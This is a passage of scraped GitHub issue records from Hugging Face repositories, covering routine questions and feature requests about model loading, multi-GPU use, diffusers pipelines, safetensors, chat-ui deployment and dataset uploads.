"created_at": "2023-10-20T06:49:00Z", "updated_at": "2023-12-18T16:21:32Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/safetensors", "number": 371, "title": "Non-blocking `save_file`", "body": "### Feature request\n\nAdd the option to make calls to `safetensors.*.save_file` non-blocking to allow execution to continue while large tensors / models are being saved.\n\n### Motivation\n\nI'm writing a script a bulk compute embeddings however I am getting poor GPU utilisation due to time spent saving to disk with `safetensors`. It would be nice if saving was non-blocking to allow execution to continue.\n\n### Your contribution\n\nI am unsure how this would work, but could give it a try if someone pointed me to the relevant code and some high level steps. Happy to defer to more experienced developers~\r\n\r\nOne issue I can see with this feature is how to deal with tensors being changed after the call to `save_file` but before saving is actually complete. A copy would work, but maybe not appropriate for large models / tensors.", "url": "https://github.com/huggingface/safetensors/issues/371", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-20T05:42:47Z", "updated_at": "2023-12-11T01:48:39Z", "comments": 1, "user": "vvvm23" }, { "repo": "huggingface/huggingface_hub", "number": 1767, "title": "Request: discerning what the default model is when using `InferenceClient` without a `model`", "body": "When doing something like the below:\r\n\r\n```python\r\nclient = InferenceClient() # NOTE: no model specified\r\nclient.feature_extraction(\"hi\")\r\n```\r\n\r\nIt would be cool to know what model is being used behind the scenes. How can one figure this out programmatically?\r\n\r\nI am thinking there may be a need for a new `InferenceClient` method resembling the following:\r\n\r\n```python\r\n def get_default_model(task: str) -> str:\r\n \"\"\"Get the model's name used by default for the input task.\"\"\"\r\n```", "url": "https://github.com/huggingface/huggingface_hub/issues/1767", "state": "closed", "labels": [ "enhancement", "good first issue" ], "created_at": "2023-10-19T20:56:53Z", "updated_at": "2023-11-08T13:47:14Z", "user": "jamesbraza" }, { "repo": "huggingface/diffusers", "number": 5457, "title": "What is function of `attention_mask` in `get_attention_scores`?", "body": "What is function of `attention_mask` in `get_attention_scores`? I guess it is used to ignore some value when calculating the attention map\r\nI can not find a example in diffusers library that actually use this `attention_mask`. Could you provide an example on how to use it?\r\n\r\nhttps://github.com/huggingface/diffusers/blob/e5168588864d72a4dca37e90318c6b11da0eaaf1/src/diffusers/models/attention_processor.py#L454", "url": "https://github.com/huggingface/diffusers/issues/5457", "state": "closed", "labels": [ "stale" ], "created_at": "2023-10-19T18:14:38Z", "updated_at": "2023-11-28T15:05:41Z", "user": "g-jing" }, { "repo": "huggingface/accelerate", "number": 2068, "title": "How to use cpu_offload function, attach_align_device_hook function\uff0c", "body": "attach_align_device_hook is called in the cpu_offload function. How is skip_keys used in attach_align_device_hook ?\r\ndef attach_align_device_hook(\r\n module: torch.nn.Module,\r\n execution_device: Optional[torch.device] = None,\r\n offload: bool = False,\r\n weights_map: Optional[Mapping] = None,\r\n offload_buffers: bool = False,\r\n module_name: str = \"\",\r\n skip_keys: Optional[Union[str, List[str]]] = None,\r\n preload_module_classes: Optional[List[str]] = None,\r\n):\r\n I wonder what the role of skip keys is?I see this function in diffusers inference stable-diffusion using enable_sequential_cpu_offload.\r\nWhat I want to achieve is to adjust some of the stable-diffusion submodules to run in the gpu, so that the vram occupancy can be controlled.\r\n", "url": "https://github.com/huggingface/accelerate/issues/2068", "state": "closed", "labels": [], "created_at": "2023-10-19T10:25:07Z", "updated_at": "2023-11-26T15:06:04Z", "user": "LeonNerd" }, { "repo": "huggingface/accelerate", "number": 2067, "title": "how to automatically load state dict from memory to a multi-gpu device?", "body": "``` Python \r\n config_dict = AutoConfig.from_pretrained(model_config, device_map=\"auto\")\r\n model = AutoModelForCausalLM.from_config(config_dict)\r\n raw_state_dict = torch.load(args.model_path, map_location=\"cpu\") \r\n state_dict = convert_ckpt(raw_state_dict)\r\n model.load_state_dict(state_dict, strict=False)\r\n```\r\n\r\n`model.load_state_dict(state_dict, strict=False)` only loads state dict on a single gpu, even when `device_map=\"auto\"` is set by `AutoConfig`. Additionally, the `load_checkpoint_and_dispatch` func only accepts a file path as the `checkpoint` parameter.\r\n\r\nIs there any way to automatically load state dict from memory to a multi-gpu device?", "url": "https://github.com/huggingface/accelerate/issues/2067", "state": "closed", "labels": [], "created_at": "2023-10-19T05:57:39Z", "updated_at": "2023-12-22T15:06:31Z", "user": "tlogn" }, { "repo": "huggingface/accelerate", "number": 2064, "title": "How to use `gather_for_metrics()` with decoder-generated strings to compute rouge score?", "body": "I am fine-tuning an encoder-decoder model and during the validation step, using the `.generate` method to generate tokens from the decoder that are subsequently decoded into strings (in this case classes). These generations are occurring across 8 GPUs and I am using Accelerate to manage the distribution.\r\n\r\nMy hope was to append these strings to lists, and pass the lists to `gather_for_metrics()` on each GPU to get a \"master list\" of predictions and references, added to the rouge metric and then computed:\r\n\r\n```python\r\npredictions, references = accelerator.gather_for_metrics(\r\n (predictions, references)\r\n )\r\n\r\nrouge_metric.add_batch(\r\n predictions=predictions,\r\n references=references,\r\n)\r\n\r\nrouge_score = rouge_metric.compute(rouge_types=[\"rougeL\"], use_aggregator=True)[\"rougeL\"]\r\n```\r\n\r\nAfter encountering some strange errors, i noticed that `gather_for_metrics()` will [only interact with tensors](https://huggingface.co/docs/accelerate/v0.19.0/en/package_reference/accelerator#accelerate.Accelerator.gather_for_metrics)\r\n\r\nAnd from what I can tell, you cannot create a torch.Tensor with string members.\r\n\r\nHow do the accelerate folks recommend using `gather_for_metrics()` with decoder-generated strings?\r\n", "url": "https://github.com/huggingface/accelerate/issues/2064", "state": "closed", "labels": [ "solved" ], "created_at": "2023-10-18T19:25:29Z", "updated_at": "2023-12-25T15:07:03Z", "user": "plamb-viso" }, { "repo": "huggingface/transformers.js", "number": 364, "title": "[Question] Error in getModelJSON with React", "body": " Hey, I am trying to transcribe audio to speech using transformers.js. I tried two ways \r\n\r\n1. https://huggingface.co/docs/transformers.js/api/pipelines#pipelinesautomaticspeechrecognitionpipeline\r\n2. https://huggingface.co/docs/transformers.js/tutorials/react\r\n\r\nBut seem to get an error like this\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/67155124/bfa37f1b-6b57-42f9-8792-8542fc2fc958)\r\n\r\nFiles for your reference: https://filebin.net/88munmsfk4u0127m\r\n\r\nPlease do let me know if I am doing something wrong or what is the best way using ReactJS\r\n", "url": "https://github.com/huggingface/transformers.js/issues/364", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-18T16:57:20Z", "updated_at": "2024-01-24T19:54:17Z", "user": "ajaykrupalk" }, { "repo": "huggingface/transformers.js", "number": 363, "title": "[Question] Build step process for Vercel", "body": "Hi, I am currently in the process of trying to deploy to Vercel using Nextjs.\r\nI am using pnpm as my package manager and have put the model in the public folder.\r\nI hit this error, when building occurs, is there something necessary post install just as #295 has done?\r\n\r\nI don't understand why this step is necessary\r\n\r\n```\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/var/task/node_modules/.pnpm/@xenova+transformers@2.6.2/node_modules/@xenova/transformers/.cache'\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/363", "state": "open", "labels": [ "question" ], "created_at": "2023-10-18T00:27:18Z", "updated_at": "2024-04-06T06:23:06Z", "user": "kyeshmz" }, { "repo": "huggingface/setfit", "number": 432, "title": "[Q] How to ensure reproducibility", "body": "Can someone explain how to ensure reproducibility of a pre-trained model (\"sentence-transformers/paraphrase-mpnet-base-v2\")? \r\n\r\nI thought that the result would be reproducible because SetFitTrainer() has a default random seed in its constructor, but found that it was not the case. SetFitTrainer source code indicates that \"to ensure reproducibility across runs, I need to use [`~SetTrainer.model_init`] function to instantiate the model\". But, I don't understand what it entails. \r\n\r\nIs there an example that I can follow? \r\n\r\nAny help would be highly appreciated. \r\n\r\nThanks, ", "url": "https://github.com/huggingface/setfit/issues/432", "state": "closed", "labels": [], "created_at": "2023-10-17T23:47:46Z", "updated_at": "2023-12-06T13:19:54Z", "user": "youngjin-lee" }, { "repo": "huggingface/chat-ui", "number": 519, "title": ".env.local prepromt env variable with multi lines", "body": "Hi\r\nI have a prepromt which is basically a 2 shorts inference. very long text ( 1200 lines like) that I want to add as a prepromts, but the env. file does not allow a multi line text as a variable \r\nany idea how to handle this?", "url": "https://github.com/huggingface/chat-ui/issues/519", "state": "open", "labels": [], "created_at": "2023-10-17T18:34:30Z", "updated_at": "2023-11-07T13:11:21Z", "comments": 6, "user": "RachelShalom" }, { "repo": "huggingface/optimum", "number": 1459, "title": "nougat to onnx", "body": "### Feature request\r\n\r\nI would like to do the transformation of the [nougat](https://huggingface.co/facebook/nougat-base) model to onnx, is it possible to do it through optimum?\r\n\r\n### Motivation\r\n\r\nNougat is a [Donut](https://huggingface.co/docs/transformers/model_doc/donut) model trained to transcribe scientific PDFs into an easy-to-use markdown format.", "url": "https://github.com/huggingface/optimum/issues/1459", "state": "closed", "labels": [], "created_at": "2023-10-17T10:03:15Z", "updated_at": "2024-08-27T06:16:17Z", "comments": 3, "user": "arvisioncode" }, { "repo": "huggingface/diffusers", "number": 5416, "title": "How to correctly implement a class-conditional model", "body": "Hi, I'd like to implement a DDPM that is class-conditioned, but not conditioned on anything else (no text), using `UNet2DConditionModel`. I'm training from scratch. \r\n\r\nI'm calling the model with `noise_pred = model(noisy_images, timesteps, class_labels=class_labels, return_dict=False)[0]`, but I get the error `UNet2DConditionModel.forward() missing 1 required positional argument: 'encoder_hidden_states'`. However, when I set `encoder_hidden_states` to `None`, I get `TypeError: AttnDownBlock2D.forward() got an unexpected keyword argument 'scale'`. I'm not sure what `encoder_hidden_states` should be set to since I'm only using class conditioning.\r\n\r\nThanks!", "url": "https://github.com/huggingface/diffusers/issues/5416", "state": "closed", "labels": [], "created_at": "2023-10-16T20:53:41Z", "updated_at": "2023-10-16T21:02:39Z", "user": "nickk124" }, { "repo": "huggingface/chat-ui", "number": 511, "title": "ChatUI on HuggingFace Spaces errors out with PermissionError: [Errno 13] Permission denied ", "body": "When I try following the below two tutorials I hit the same error, where the container code tries to create a directory and fails due to permission issues on the host\r\n\r\ntutorials: \r\n1. https://huggingface.co/docs/hub/spaces-sdks-docker-chatui#chatui-on-spaces\r\n2. https://huggingface.co/blog/Llama2-for-non-engineers\r\n\r\nNote: I have set the env vars `HUGGING_FACE_HUB_TOKEN` and in a prior attempt `HF_TOKEN` as well.\r\n\r\n\"Screenshot\r\n\r\n\r\nstack trace on hugging face space\r\n```\r\nTraceback (most recent call last):\r\n\r\n File \"/opt/conda/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/cli.py\", line 131, in download_weights\r\n utils.download_and_unload_peft(\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/peft.py\", line 38, in download_and_unload_peft\r\n os.makedirs(model_id, exist_ok=True)\r\n\r\n File \"/opt/conda/lib/python3.9/os.py\", line 215, in makedirs\r\n makedirs(head, exist_ok=exist_ok)\r\n\r\n File \"/opt/conda/lib/python3.9/os.py\", line 225, in makedirs\r\n mkdir(name, mode)\r\n\r\nPermissionError: [Errno 13] Permission denied: 'skrelan'\r\n```\r\n", "url": "https://github.com/huggingface/chat-ui/issues/511", "state": "open", "labels": [ "support", "spaces" ], "created_at": "2023-10-16T08:29:06Z", "updated_at": "2023-12-17T02:58:52Z", "comments": 3, "user": "Skrelan" }, { "repo": "huggingface/candle", "number": 1105, "title": "How to run a model in Fp16?", "body": "EDIT: Never mind, see below comment ", "url": "https://github.com/huggingface/candle/issues/1105", "state": "closed", "labels": [], "created_at": "2023-10-16T03:32:16Z", "updated_at": "2023-10-18T19:40:54Z", "user": "joeyballentine" }, { "repo": "huggingface/candle", "number": 1104, "title": "How to load .pth file weights?", "body": "I've been experimenting with candle and re-implementing ESRGAN in it. I ended up needing to convert a couple .pth files I have into .safetensors format in python in order to load them into the VarBuilder. I saw on the docs you say this supports loading pytorch weights directly though, but there does not seem to be an example on how to do that. I looked into the pickle module included in the library and got as far as being able to read the weights into a pickle format with TensorInfo, but then I got stuck trying to convert those to tensors and get it in a format VarBuilder would accept.\r\n\r\nAn example on how to either load these weights or convert them to safetensors format in rust would be great, thanks!", "url": "https://github.com/huggingface/candle/issues/1104", "state": "open", "labels": [], "created_at": "2023-10-16T03:29:53Z", "updated_at": "2023-10-19T22:01:42Z", "user": "joeyballentine" }, { "repo": "huggingface/datasets", "number": 6303, "title": "Parquet uploads off-by-one naming scheme", "body": "### Describe the bug\n\nI noticed this numbering scheme not matching up in a different project and wanted to raise it as an issue for discussion, what is the actual proper way to have these stored?\r\n\r\n\"image\"\r\n\r\nThe `-SSSSS-of-NNNNN` seems to be used widely across the codebase. The section that creates the part in my screenshot is here https://github.com/huggingface/datasets/blob/main/src/datasets/arrow_dataset.py#L5287\r\nThere are also some edits to this section in the single commit branch.\n\n### Steps to reproduce the bug\n\n1. Upload a dataset that requires at least two parquet files in it\r\n2. Observe the naming scheme\n\n### Expected behavior\n\nThe couple options here are of course **1. keeping it as is**\r\n\r\n**2. Starting the index at 1:**\r\ntrain-00001-of-00002-{hash}.parquet\r\ntrain-00002-of-00002-{hash}.parquet\r\n\r\n**3. My preferred option** (which would solve my specific issue), dropping the total entirely:\r\ntrain-00000-{hash}.parquet\r\ntrain-00001-{hash}.parquet\r\n\r\nThis also solves an issue that will occur with an `append` variable for `push_to_hub` (see https://github.com/huggingface/datasets/issues/6290) where as you add a new parquet file, you need to rename everything in the repo as well. \r\n\r\nHowever, I know there are parts of the repo that use 0 as the starting file or may require the total, so raising the question for discussion.\r\n\n\n### Environment info\n\n- `datasets` version: 2.14.6.dev0\r\n- Platform: macOS-14.0-arm64-arm-64bit\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.18.0\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 1.5.3", "url": "https://github.com/huggingface/datasets/issues/6303", "state": "open", "labels": [], "created_at": "2023-10-14T18:31:03Z", "updated_at": "2023-10-16T16:33:21Z", "comments": 4, "user": "ZachNagengast" }, { "repo": "huggingface/diffusers", "number": 5392, "title": "How to train an unconditional latent diffusion model ?", "body": "It seems that there is only one available unconditional LDM model (CompVis/ldm-celebahq-256). \r\n```python\r\npipeline = LDMPipeline.from_pretrained(\"CompVis/ldm-celebahq-256\")\r\n```\r\nHow can I train this unconditional model on my own dataset? The LDM model includes the training of both `VQModel` and `UNet2DModel`, but the [official training examples](https://github.com/huggingface/diffusers/blob/main/examples/unconditional_image_generation/train_unconditional.py) seem not to be fully applicable.\r\n", "url": "https://github.com/huggingface/diffusers/issues/5392", "state": "closed", "labels": [], "created_at": "2023-10-14T03:32:34Z", "updated_at": "2024-02-16T08:59:49Z", "user": "Rashfu" }, { "repo": "huggingface/safetensors", "number": 368, "title": "Streaming weights into a model directly?", "body": "### Feature request\r\n\r\nHi! I'm curious whether there is a way to stream model weights from disk into the on-GPU model directly?\r\n\r\nThat is, [I see](https://huggingface.co/docs/safetensors/speed#gpu-benchmark) that by settings `os.environ[\"SAFETENSORS_FAST_GPU\"] = \"1\"` and using `load_file`, you can stream the weights themselves from disk to GPU. But if I understand correctly, one still has to wait for all of the weights to be moved to GPU before they can subsequently be loaded into the model itself: first load the weights to GPU by some means (possibly streaming), then `model.load(weights)`, schematically. \r\n\r\nIs there a way to overlap the loading-into-model step with the streaming from disk?\r\n\r\nIs something like that possible? Or already implemented somewhere?\r\n\r\n### Motivation\r\n\r\nFaster model loading.\r\n\r\n### Your contribution\r\n\r\nI don't know `rust`, but would be happy to contribute `python`-side. Just not sure if the request is feasible.", "url": "https://github.com/huggingface/safetensors/issues/368", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-13T15:21:33Z", "updated_at": "2023-12-11T01:48:41Z", "comments": 1, "user": "garrett361" }, { "repo": "huggingface/huggingface_hub", "number": 1734, "title": "Docs request: what is loaded/loadable?", "body": "When working with `get_model_status`: https://huggingface.co/docs/huggingface_hub/main/en/package_reference/inference_client#huggingface_hub.InferenceClient.get_model_status\r\n\r\nIt tells you if the model is loadable and/or loaded. The question is, what does this mean?\r\n- What does \"loaded\" mean... what is it loaded into?\r\n- If something isn't loaded, but is loadable, how can one load it?", "url": "https://github.com/huggingface/huggingface_hub/issues/1734", "state": "closed", "labels": [], "created_at": "2023-10-13T04:59:47Z", "updated_at": "2023-10-17T14:18:11Z", "user": "jamesbraza" }, { "repo": "huggingface/trl", "number": 868, "title": "What is the difference of these two saved checkpoints in sft_llama2 example?", "body": "I am trying to understand this\r\nhttps://github.com/huggingface/trl/blob/main/examples/research_projects/stack_llama_2/scripts/sft_llama2.py#L206C1-L206C1\r\n\r\n`trainer.model.save_pretrained(output_dir)` seems already saves the base+lora model to the \"final_checkpoint\".\r\nThen what is doing here `model = model.merge_and_unload()` and save it again to \"final_merged_checkpoint\"?\r\n```\r\ntrainer.save_model(script_args.output_dir)\r\n\r\noutput_dir = os.path.join(script_args.output_dir, \"final_checkpoint\")\r\ntrainer.model.save_pretrained(output_dir)\r\n\r\n# Free memory for merging weights\r\ndel base_model\r\ntorch.cuda.empty_cache()\r\n\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map=\"auto\", torch_dtype=torch.bfloat16)\r\nmodel = model.merge_and_unload()\r\n\r\noutput_merged_dir = os.path.join(script_args.output_dir, \"final_merged_checkpoint\")\r\nmodel.save_pretrained(output_merged_dir, safe_serialization=True)\r\n```", "url": "https://github.com/huggingface/trl/issues/868", "state": "closed", "labels": [], "created_at": "2023-10-13T04:31:57Z", "updated_at": "2023-10-30T17:15:35Z", "user": "Emerald01" }, { "repo": "huggingface/blog", "number": 1577, "title": "How to use mAP metric for object detection task?", "body": "I use pretrained checkpoint `facebook/detr-resnet-50` \r\nHow can I use mAP for metric evaluating?\r\n```\r\ncheckpoint = \"facebook/detr-resnet-50\"\r\nmodel = AutoModelForObjectDetection.from_pretrained(\r\n checkpoint, ..., ignore_mismatched_sizes=True,\r\n)\r\n\r\nmetric = evaluate.load('repllabs/mean_average_precision')\r\n\r\ndef compute_metrics(eval_pred):\r\n logits, labels = eval_pred\r\n predictions = np.argmax(logits, axis=-1)\r\n return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n args=training_args,\r\n data_collator=collate_fn,\r\n train_dataset=dataset[\"train\"].with_transform(transform_aug_ann),\r\n eval_dataset=dataset[\"test\"].with_transform(transform_aug_ann),\r\n compute_metrics=compute_metrics,\r\n tokenizer=image_processor,\r\n)\r\n```\r\nI tried this way, but I have some errors here", "url": "https://github.com/huggingface/blog/issues/1577", "state": "open", "labels": [], "created_at": "2023-10-12T13:58:52Z", "updated_at": "2023-12-04T12:01:33Z", "user": "IamSVP94" }, { "repo": "huggingface/accelerate", "number": 2051, "title": "Accelerate Examples: What is expected to print on terminal?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 0.23.0\r\n- Platform: Linux-5.4.0-121-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- Numpy version: 1.26.0\r\n- PyTorch version (GPU?): 1.13.1 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- System RAM: 1007.69 GB\r\n- GPU type: NVIDIA A100-SXM4-40GB\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: MULTI_GPU\r\n - mixed_precision: fp16\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 2\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - gpu_ids: 3,4\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [X] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nI was trying to run a simple example (`nlp_example.py`) to kind of perform the equivalent of a hello world task in accelerate, but unfortunately, I'm uncertain as to whether it's working correctly, and I'm somewhat embarrassed to have to post this issue ticket to seek assistance. \ud83d\ude05\r\n\r\nI ran `$ python examples/nlp_example.py --cpu ` and got this output:\r\n\r\n```bash\r\nSome weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-cased and are newly initialized: ['classifier.bias', 'classifier.weight']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\r\nYou're using a BertTokenizerFast tokenizer. Please note that with a fast tokenizer, using the `__call__` method is faster than using a method to encode the text followed by a call to the `pad` method to get a padded encoding.\r\n```\r\n\r\nI believe the program continues to run after the above message is printed because control of the terminal's prompt isn't returned to me.\r\n\r\nThere isn't a tqdm bar, progress bar, or signs of life of some sort to indicate that the example was running.\r\n\r\nWould be great if someone who has some success at running any basic accelerate example scripts to chime in \ud83d\ude42\r\n\r\n### Expected behavior\r\n\r\nSigns of life of some sort to indicate that the example is running fine.", "url": "https://github.com/huggingface/accelerate/issues/2051", "state": "closed", "labels": [], "created_at": "2023-10-12T13:50:40Z", "updated_at": "2023-10-12T15:06:44Z", "user": "davidleejy" }, { "repo": "huggingface/text-generation-inference", "number": 1137, "title": "When I start the model, I get a warning message. I want to know why and how to solve it.", "body": "### System Info\r\n\r\n\r\n- OS version: Debian GNU/Linux 11 (bullseye)\r\n- Commit sha: 00b8f36fba62e457ff143cce35564ac6704db860\r\n- Cargo version: 1.70.0\r\n- model: Starcoder\r\n- nvidia-smi:\r\n```\r\nThu Oct 12 18:23:03 2023\r\n +---------------------------------------------------------------------------------------+\r\n | NVIDIA-SMI 535.54.03 Driver Version: 535.54.03 CUDA Version: 12.2 |\r\n |-----------------------------------------+----------------------+----------------------+\r\n | GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n | Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\r\n | | | MIG M. |\r\n |=========================================+======================+======================|\r\n | 0 NVIDIA A800-SXM4-80GB On | 00000000:4B:00.0 Off | 0 |\r\n | N/A 29C P0 73W / 400W | 36679MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 1 NVIDIA A800-SXM4-80GB On | 00000000:51:00.0 Off | 0 |\r\n | N/A 31C P0 62W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 2 NVIDIA A800-SXM4-80GB On | 00000000:6A:00.0 Off | 0 |\r\n | N/A 31C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 3 NVIDIA A800-SXM4-80GB On | 00000000:6F:00.0 Off | 0 |\r\n | N/A 29C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 4 NVIDIA A800-SXM4-80GB On | 00000000:8D:00.0 Off | 0 |\r\n | N/A 28C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 5 NVIDIA A800-SXM4-80GB On | 00000000:92:00.0 Off | 0 |\r\n | N/A 30C P0 62W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 6 NVIDIA A800-SXM4-80GB On | 00000000:C9:00.0 Off | 0 |\r\n | N/A 32C P0 67W / 400W | 78233MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 7 NVIDIA A800-SXM4-80GB On | 00000000:CF:00.0 Off | 0 |\r\n | N/A 29C P0 58W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n\r\n +---------------------------------------------------------------------------------------+\r\n | Processes: |\r\n | GPU GI CI PID Type Process name GPU Memory |\r\n | ID ID Usage |\r\n |=======================================================================================|\r\n +---------------------------------------------------------------------------------------+\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [X] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [X] My own modifications\r\n\r\n### Reproduction\r\n\r\nMy execution command is:\r\n\r\n```\r\nCUDA_VISIBLE_DEVICES=0 /workspace/xieshijie/text-generation-inference/target/release/deps/text_generation_launcher-b64a71565ded74a5 --model-id /workspace/xieshijie/huggingface-models/starcoder2/models--bigcode--starcoder/snapshots/e117ab3b3d0769fd962bd48b099de711757a3d60 --port 6006 --max-input-length 8000 --max-total-tokens 8192 --max-batch-prefill", "url": "https://github.com/huggingface/text-generation-inference/issues/1137", "state": "closed", "labels": [], "created_at": "2023-10-12T10:33:38Z", "updated_at": "2023-10-19T07:02:58Z", "user": "coder-xieshijie" }, { "repo": "huggingface/datasets", "number": 6299, "title": "Support for newer versions of JAX", "body": "### Feature request\r\n\r\nHi,\r\n\r\nI like your idea of adapting the datasets library to be usable with JAX. Thank you for that.\r\n\r\nHowever, in your [setup.py](https://github.com/huggingface/datasets/blob/main/setup.py), you enforce old versions of JAX <= 0.3... It is very cumbersome !\r\n\r\nWhat is the rationale for such a limitation ? Can you remove it please ?\r\n\r\nThanks,\r\n\r\n### Motivation\r\n\r\nThis library is unusable with new versions of JAX ?\r\n\r\n### Your contribution\r\n\r\nYes.", "url": "https://github.com/huggingface/datasets/issues/6299", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-10-12T10:03:46Z", "updated_at": "2023-10-12T16:28:59Z", "comments": 0, "user": "ddrous" }, { "repo": "huggingface/diffusers", "number": 5372, "title": "How to use safety_checker in StableDiffusionXLPipeline?", "body": "### Describe the bug\r\n\r\nI want to use safety_checker in StableDiffusionXLPipeline, but it seems that `safety_checker` keyword does not take effect\r\n\r\n### Reproduction\r\n\r\n```python\r\npipe = StableDiffusionXLPipeline.from_pretrained(\r\n \"nyxia/mysterious-xl\",\r\n torch_dtype=torch.float16,\r\n safety_checker = StableDiffusionSafetyChecker.from_pretrained(\"CompVis/stable-diffusion-safety-checker\"),\r\n).to(\"cuda\")\r\npipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)\r\nresult = pipe(\r\n prompt=\"1girl\",\r\n)\r\n```\r\n\r\n### Logs\r\n\r\nI got folling error\r\n\r\n```shell\r\n\r\nKeyword arguments {'safety_checker': StableDiffusionSafetyChecker(\r\n (vision_model): CLIPVisionModel(\r\n (vision_model): CLIPVisionTransformer(\r\n (embeddings): CLIPVisionEmbeddings(\r\n (patch_embedding): Conv2d(3, 1024, kernel_size=(14, 14), stride=(14, 14), bias=False)\r\n (position_embedding): Embedding(257, 1024)\r\n )\r\n (pre_layrnorm): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n (encoder): CLIPEncoder(\r\n (layers): ModuleList(\r\n (0-23): 24 x CLIPEncoderLayer(\r\n (self_attn): CLIPAttention(\r\n (k_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (v_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (q_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (out_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n )\r\n (layer_norm1): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n (mlp): CLIPMLP(\r\n (activation_fn): QuickGELUActivation()\r\n (fc1): Linear(in_features=1024, out_features=4096, bias=True)\r\n (fc2): Linear(in_features=4096, out_features=1024, bias=True)\r\n )\r\n (layer_norm2): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n )\r\n )\r\n )\r\n (post_layernorm): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n )\r\n )\r\n (visual_projection): Linear(in_features=1024, out_features=768, bias=False)\r\n)} are not expected by StableDiffusionXLPipeline and will be ignored.\r\n```\r\n\r\n\r\n### System Info\r\n\r\n- `diffusers` version: 0.20.0\r\n- Platform: Linux-5.4.0-148-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.6\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Huggingface_hub version: 0.17.3\r\n- Transformers version: 4.34.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.22\r\n- Using GPU in script?: yes\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @patrickvonplaten\r\n\r\nthanks for your kindly help", "url": "https://github.com/huggingface/diffusers/issues/5372", "state": "closed", "labels": [ "bug" ], "created_at": "2023-10-12T03:39:23Z", "updated_at": "2023-10-12T08:13:28Z", "user": "hundredwz" }, { "repo": "huggingface/transformers.js", "number": 354, "title": "[Question] Whisper Progress", "body": "Is it possible to obtain the transcription progress of Whisper's model, ranging from 0 to 100%?", "url": "https://github.com/huggingface/transformers.js/issues/354", "state": "open", "labels": [ "question" ], "created_at": "2023-10-11T20:41:01Z", "updated_at": "2025-05-23T10:12:13Z", "user": "FelippeChemello" }, { "repo": "huggingface/text-generation-inference", "number": 1131, "title": "How to send a request with system, user and assistant prompt?", "body": "How to send in a request prompt(system, user or assistant) like chatgpt where we can specify to out of 3 categories, does the prompt belong?", "url": "https://github.com/huggingface/text-generation-inference/issues/1131", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-11T09:21:14Z", "updated_at": "2024-01-10T17:26:12Z", "user": "ShRajSh" }, { "repo": "huggingface/dataset-viewer", "number": 1962, "title": "Install dependency `music_tag`?", "body": "Requested here: https://huggingface.co/datasets/zeio/baneks-speech/discussions/1", "url": "https://github.com/huggingface/dataset-viewer/issues/1962", "state": "closed", "labels": [ "question", "custom package install", 